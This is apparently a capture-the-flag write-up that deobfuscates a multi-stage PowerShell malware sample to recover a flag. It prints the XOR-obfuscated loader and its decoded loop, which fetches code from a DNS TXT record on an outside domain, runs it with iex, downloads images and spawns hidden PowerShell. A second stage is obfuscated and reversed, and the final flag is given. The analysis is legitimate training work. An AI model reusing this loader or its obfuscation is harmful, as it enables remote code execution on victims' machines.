"$(SeT-varIABLE  'ofS'  '' ) " +[STriNg]( '90O69U68-65<72O13U5C9%89<95j88%72C4%13j86g39C13U13-13B13B9B74O65<68C73W72B72j65O79j66W90C13j16<13j68W72g85B13<5W118W126O84<94U89C72B64%3%121C72j85C89U3B104O67W78C66g73B68O67W74<112j23%23U120-121%107C21j3U106O72W89W126<89U95B68j67W74g5C118B126C84%94B89g72j64-3B110B66g67g91j72B95U89W112O23%23<107W95j66U64%111<76W94W72<27-25O126U89C95g68-67C74g5O5j127B72C94W66j65C91C72-0W105%67j94-99B76W64W72U13g123U107g73O122g79%65C65-123%126U67O119g68U79-117j96W20U3j79-68C74C65<68C87j76-95U73W65W66j91C72W95j3O78j66-64<13C0W121%84O93g72%13-89g85%89-13j81<13B126O72U65C72j78j89U0g98U79-71<72j78j89O13%0<104U85O93W76<67g73j125j95j66<93B72C95<89<84U13O126-89g95g68C67C74<94W4B4U4B4%39-13%13<13O13B9-89O90g68B65<68g74<69W89j73%72C93C72U67O73g13%16g13-103j66U68-67<0U125O76B89j69-13C9W72<67C91<23U121%104j96j125j13g15<65B68g87B76C95U73W3-71W93C74-15j39W13%13-13-13C9g79B68U94U78<88U68g89g95%72W78W66g74O67j68%87B72g13O16j13W106W72W89-0j127U76C67%73%66j64g13B0W96B68O67C68U64U88B64O13j28B13C0g96O76-85U68%64C88W64j13<31g24C39g13O13-13-13W9O74j76g65U76-85j84<75<72<76g94%89j93<76B95<89j84-13C16%13-15<69<89j89U93-94j23%2j2<79g68j74j65B68O87B76W95W73g65-66B91<72O95C3%78%66U64<2<68%64g74j2W65B68-87B76-95C73-9W79%68O94W78-88<68O89O95U72j78O66U74<67%68U87O72O3g71B93C74C15<39W13%13U13-13<100U67W91C66-70U72-0<122U72-79O127C72U92-88W72C94%89g13U9%74U76C65B76B85j84W75j72W76U94<89C93O76-95W89C84g13j0<98W88-89g107j68O65g72B13-9<89U90C68W65j68%74%69<89-73C72<93U72C67<73B13g0U104g95<95j66U95O108g78g89<68U66%67U13<126%68B65O72<67-89-65g84<110j66j67C89j68O67<88j72<13-81U13g98j88C89%0g99B88%65j65g39<13g13B13C13B108%73<73U0g121%84j93O72%13j0-121<84g93B72O105<72C75<68U67B68g89O68<66j67U13O15O88O94O68g67C74C13U126-84U94O89<72B64U22B13U88<94W68W67W74O13-126U84<94g89%72<64W3j127%88<67O89B68U64W72W3U100W67B89j72C95g66O93<126B72C95<91j68B78j72<94-22O13C93%88W79U65-68j78W13W78B65W76O94-94g13%122j13O86O13g118g105<65U65C100g64g93%66W95-89-5g77U15O88-94<72j95-30<31g3%73U65C65j77-15W4C112B13C93g88-79j65-68j78O13O94W89C76O89g68W78-13O72W85j89U72B95W67U13B79j66C66O65C13%126g84-94%89U72-64C125-76W95-76C64W72B89g72O95U94W100<67-75W66%5B68C67B89j13O88C108-78O89B68j66j67B1C68B67j89-13%88C125C76O95W76<64O1g94B89U95B68-67U74W13g65<93j91B125W76B95-76W64g1O68j67B89j13%75g88W122j68j67B100C67U68<4%22B13-80W15-22W13<118-122W112C23g23g126-84W94B89W72j64j125g76-95%76B64C72g89O72O95U94j100%67%75g66O5W31O29B1C29<1U9g89U90U68-65%68W74j69j89B73W72<93C72g67j73B1W28U6-31-4-13<81C13C98C88%89W0%99j88B65O65B39C13B13-13-13<126W89j76<95O89j0<125<95g66j78C72O94%94j13<93W66%90O72<95-94W69%72-65C65j13-0g108j95%74W88B64-72j67j89W97g68C94-89B13O10-0C110j66-64C64g76B67%73%10O1j13O9W74O65B68<73g72<72<65-79W66U90O13C0C122g68g67%73C66%90j126g89-84%65O72j13j101W68-73W73<72-67%39g80%39W9U66g79j71U72B78%89B121<72-94<89g13j16%13-15C122O64W28O25O76C107<66%87U78%87g99C98j76-70j29g90C121O122B93B119j99%123B65W117C123O64j69g125U127B106-94<20B15-39'-SPlIT 'o' -SPLIT'<'-SplIT'%'-SplIt'w'-SPLIT'B' -SPLIT'J'-spliT'-'-SpLit 'c'-SPlIT 'U' -spLIT'g'| fOREach{[cHar]( $_ -bXoR'0x2d')}) +" $(sEt-ITEM 'variaBlE:oFs' ' ' ) " |&( ([STRing]$verBOsEPREference)[1,3]+'X'-jOIn'')

which renders as :

 while ($true) {
    $glideelbow = iex ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Resolve-DnsName VFdWbllVSnZibXM9.biglizardlover.com -Type txt | Select-Object -ExpandProperty Strings))))
    $twilightdepend = Join-Path $env:TEMP "lizard.jpg"
    $biscuitrecognize = Get-Random -Minimum 1 -Maximum 25
    $galaxyfeastparty = "https://biglizardlover.com/img/lizard$biscuitrecognize.jpg"
    Invoke-WebRequest $galaxyfeastparty -OutFile $twilightdepend -ErrorAction SilentlyContinue | Out-Null
    Add-Type -TypeDefinition "using System; using System.Runtime.InteropServices; public class W { [DllImport(`"user32.dll`")] public static extern bool SystemParametersInfo(int uAction,int uParam,string lpvParam,int fuWinIni); }"; [W]::SystemParametersInfo(20,0,$twilightdepend,1+2) | Out-Null
    Start-Process powershell -ArgumentList '-Command', $glideelbow -WindowStyle Hidden
}
$objectTest = "Wm14aFozczNOak0wTWpZNVlXVmhPRGs9"

First: the variable objectTest is a part of our flag:

This payload performs a DNS query to VFdWbllVSnZibXM9.biglizardlover.com and execute its content. Let’s try it:

dig txt VFdWbllVSnZibXM9.biglizardlover.com
;; Truncated, retrying in TCP mode.

; <<>> DiG 9.10.6 <<>> txt VFdWbllVSnZibXM9.biglizardlover.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30548
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;VFdWbllVSnZibXM9.biglizardlover.com. IN        TXT

;; ANSWER SECTION:
VFdWbllVSnZibXM9.biglizardlover.com. 300 IN TXT "JiAoICRWZXJib3NlcHJlRmVyZW5DZS50T3NUcmluRygpWzEsM10rJ1gnLWpPSW4nJykgKG5lVy1vYmpFQ3QgaW8uU3RSRUFtckVhRGVyKChuZVctb2JqRUN0IFN5c3RlTS5JTy5jT01QUmVTU2lPbi5kZWZsYVRlc3RSZWFtKCBbU3lzdEVtLmlPLm1FbW9yWVN0ckVhTV0gW0NPblZFUlRdOjpGUm9NQmFzZTY0c1RyaU5HKCdqVkpkYzZwSUV" "QMHJVN2RTdDZGR0NhQVJjV3NmVUNjcUlCcG0vSWdVRDRoRWlTSUd2TWFQOHI5dnRadmE1MzJabXVtZTdqNTl6bm1LaC9hMXAvNU5mc215V1F1TGFOTUpLblZkKzdrMWZrS3ZWUm5rTzFEUWdjSnRmdGR2Tkt4cFFUZDFkMnpETWFGaWdvYVBtSnRzK1AwUklFQkJJci9KWGJ2SlVuY1BGQktna0l0dWxQaUtMS2VEVGhtMVd1RjZQK2lPZ0VLOH" "g3UWlnTUtjQVFXaEFJVXNFUndvdkpjQmRxdkljc2t4NTQrenZNTzZyVmJJVmpsUUdIcDV5a3Vnd1B3eFBrY2RiTFhQMDdKTWlnTkdnTUlvVmtZRG9CQlVaSExYYjFhOWRnVUtUYWVuK2FiNmFUU0F3cXo0OGhQMUdqbUY1dUowdzNYOGw3bUduYU0wejl0QW9kdkh3NkMybXI0Y2JjTndjWDdEOHZ5bFMwZXpEUUlmVS95VDF1cXZPSGxkQndvc" "lpHbUNIS3k4YXpxZkcwMnMrc0JsdS9oM1htenE5U2xRTURIeHZOU2ZPMmRzcFdIUzIyd3o3TGhpQzlYRkhxTllqeEVTVU1CMU5XZDRjTTZOcG04UHJmNEVLTlN0MSsvdktSS1ZacHl6eG9hL21FRGhFUDhnMllrYTQ0THQ5S2gvV3VCVTFZNE80NlAvZmVGbmo3OEJoVVhNa01JSUpiRk1JMGFRNXNSQktZRENZTzFoMHNWdGw5dkU2R1ZmZ3dH" "aWNSeUIyMnJUMkRPdXpTTlNPUFJPYUowWXVaaTZzelI2NXMvYXRyMndlOGI1N2Rod3NPZkx2OHBOek5tMjhON2FMRGVhdlh6eGRxVUxKQ2lySVNYRzFmb2NxdjFHKzh2UlRZb1FiVytxbStwVzg1WUw4UWVKU3Q0WERtYm1BaWRQSnM0eXNvSENlamJHdDdwRitiNmpUbTk3QVFyME5FZFRNTXR1Um1Qei9lT3UzeVQ4dkUvUlg2TEVQUnFNNDF" "idExQZGZXNjFRRk1uSkczVUNFZzZ0aHdzRnYvZ294NUJseWloVmhzaVdRTE5jOEFpSWxGbk1QNktCRTJIdFBsZ1hMWTNVb1RFWmxoNFFReDRyK1VCNW9CSGxwU1FpWnA5THRGVjFocVdvT0pFa0g3dXZMT1puRnQ1OHdSOHoyYkY4NTBTZ3RQOVZKWHNpRVpBa0loRVpZSi9tZGhYbVFNTmFSUXRrRnUrVEl2bElpa1BDUjIwL21UNkZheTh0am" "1VZ0VVa2h2OGhmNURlUnlGTzVTWGE3d1NyUVF2ckVIL2R1b05WQ0NtZVFwWUNMSXZYV1lhdjFtUTg4Q1lCVWlFUklqeDJySjh0UG83YkxDSkdna3dHRlR4UnJyWUlzSzZmSW5iQ0FWSW1tS0tRcS9kOEt4VTMydldOZkRva3NrMzhBJyksW1NZU1RFbS5JTy5jT21wUkVzU0lvbi5Db01wUmVTU2lvbm1vREVdOjpkRUNvbVByZVNTKSkgLCBbd" "EV4VC5lbmNPZGluZ106OmFzY0lpKSApLnJFQURUb2VORCggKSAK"

;; Query time: 1561 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Sat Nov 01 16:28:07 CET 2025
;; MSG SIZE  rcvd: 1920

After decoding the base64:

& ( $VerbosepreFerenCe.tOsTrinG()[1,3]+'X'-jOIn'') (neW-objECt io.StREAmrEaDer((neW-objECt SysteM.IO.cOMPReSSiOn.deflaTestReam( [SystEm.iO.mEmorYStrEaM] [COnVERT]::FRoMBase64sTriNG('jVJdc6pIEP0rU7dSt6FGCaARcWsfUCcqIBpm/IgUD4hEiSIGvMaP8r9vtZva532Zmume7j59znmKh/a1p/5NfsmyWQuLaNMJKnVd+7k1fkKvVRnkO1DQgcJtftdvNKxpQTd1d2zDMaFigoaPmJts+P0RIEBBIr/JXbvJUncPFBKgkItulPiKLKeDThm1WuF6P+iOgEK8x7QigMKcAQWhAIUsERwovJcBdqvIcskx54+zvMO6rVbIVjlQGHp5ykugwPwxPkcdbLXP07JMigNGgMIoVkYDoBBUZHLXb1a9dgUKTaen+ab6aTSAwqz48hP1GjmF5uJ0w3X8l7mGnaM0z9tAodvHw6C2mr4cbcNwcX7D8vylS0ezDQIfU/yT1uqvOHldBworZGmCHKy8azqfG02s+sBlu/h3Xmzq9SlQMDHxvNSfO2dspWHS22wz7LhiC9XFHqNYjxESUMB1NWd4cM6Npm8Prf4EKNSt1+/vKRKVZpyzxoa/mEDhEP8g2Yka44Lt9Kh/WuBU1Y4O46P/feFnj78BhUXMkMIIJbFMI0aQ5sRBKYDCYO1h0sVtl9vE6GVfgwGicRyB22rT2DOuzSNSOPROaJ0YuZi6szR65s/atr2we8b57dhwsOfLv8pNzNm28N7aLDeavXzxdqULJCirISXG1focqv1G+8vRTYoQbW+qm+pW85YL8QeJSt4XDmbmAidPJs4ysoHCejbGt7pF+b6jTm97AQr0NEdTMMtuRmPz/eOu3yT8vE/RX6LEPRqM41btLPdfW61QFMnJG3UCEg6thwsFv/gox5BlyihVhsiWQLNc8AiIlFnMP6KBE2HtPlgXLY3UoTEZlh4QQx4r+UB5oBHlpSQiZp9LtFV1hqWoOJEkH7uvLOZnFt58wR8z2bF850SgtP9VJXsiEZAkIhEZYJ/mdhXmQMNaRQtkFu+TIvlIikPCR20/mT6Fay8tjmUgEUkhv8hf5DeRyFO5SXa7wSrQQvrEH/duoNVCCmeQpYCLIvXWYav1mQ88CYBUiERIjx2rJ8tPo7bLCJGgkwGFTxRrrYIsK6fInbCAVImmKKQq/d8KxU32vWNfDoksk38A'),[SYSTEm.IO.cOmpREsSIon.CoMpReSSionmoDE]::dEComPreSS)) , [tExT.encOding]::ascIi) ).rEADToeND( )

We can decode the payload (again):

$cMJzG0= "))93]rahC[,421]rahC[,63]rahC[F-)')}'+'2'+'{X}2{+]31[DiLlEhS}'+'0'+'{+]1[DiLLehS}0'+'{ '+'( & }1{)(Dn'+'e'+'oTDaeR.))iICsa::]gnIDO'+'cne'+'.T'+'XE'+'T.'+'meTS'+'Ys[ '+',))sSE'+'RPmoCED::]Edo'+'MNoiSs'+'ERP'+'MOC'+'.noisserp'+'M'+'Oc.OI'+'[,) }2{A43z'+'8KG1R90j76'+'WrqRe0zaKr1L'+'m7LKR5X1s'+'aiooB'+'DH'+'D7+J0i5tJ77Lo'+'6ANRbL+OWh'+'TP+H'+'i34F'+'Mg4'+'d'+'0Un'+'dNziXX78'+'6fT'+'D'+'iXrh44V'+'98'+'/b2/Cx'+'T1'+'iNhkmH'+'dEZ0Ln'+'Oc2c'+'a'+'P'+'1KMpKx68RJMAHU'+'4AFwwVE'+'imSSE6hS59'+'pc'+'d'+'lT3ESTEl2aHvZV'+'0JapPtRwySxNSQ'+'ZcEC'+'ae'+'A97cD'+'9UK'+'Y'+'IgN'+'aLh'+'bke7GmqIIa'+'KKT4'+'1VcN7z8t'+'mMNv'+'2cF'+'VLWia/S/1kBZJG7xQt6KK'+'5'+'ERPU9WkrNQBEo78GoZQz+ZT'+'m3'+'/7zAjM0H6BqK29+'+'ZJNV290k1NbZTu1'+'eYZK+'+'XTt'+'UUKbaJ'+'gWPt'+'0kB'+'waCGky'+'+vXM'+'EAJ8aP9Yf}2{('+'gni'+'RTs4'+'6ESa'+'BmoRF::]TrevNOC[ ]MAE'+'RTSyR'+'OMEm.Oi.Me'+'Ts'+'ys'+'[ (mAERtS'+'eTAlfED.'+'N'+'oissER'+'pM'+'oc.oI.M'+'ETsys TcEjbo'+'-W'+'en'+' ((Re'+'dAERmAe'+'RTS.Oi.MEtsYS Tc'+'Ejbo'+'-Wen ( '(( ( )''nioJ-'X'+]3,1[)EcnereferpeSOBReV$]gNirts[( (. " ; & ( $shellId[1]+$ShellID[13]+'x')([STriNg]::joIN('' , (  GEt-vARiaBLE  ('Cm'+'j'+'Zg0')).vaLUE[ - 1.. -((  GEt-vARiaBLE  ('Cm'+'j'+'Zg0')).vaLUE.LenGtH)] ))

which renders as:

Add-Type -AssemblyName System.Speech; Add-Type -AssemblyName System.Windows.Forms
$SpeechSynth = New-Object System.Speech.Synthesis.SpeechSynthesizer
$SpeechSynth.SelectVoice('Microsoft Zira Desktop')
$lizard = Get-Date -Format tt
while ($true) {
    $SpeechSynth.Speak($lizard)
    [System.Windows.Forms.MessageBox]::Show($lizard, 'Alert', 'OK', 'Information')
}
$UniqueRebel = "TWpVeU9UWXlORGN3ZlE9PQ=="

And we got our final part: TWpVeU9UWXlORGN3ZlE9PQ==. From the base64: 252962470}

Final flag: flag{7634269aea89c0434d59028252962470}

Updated on 2025-11-01
 Malware AnalysisHUNTRESSCTF
 | Home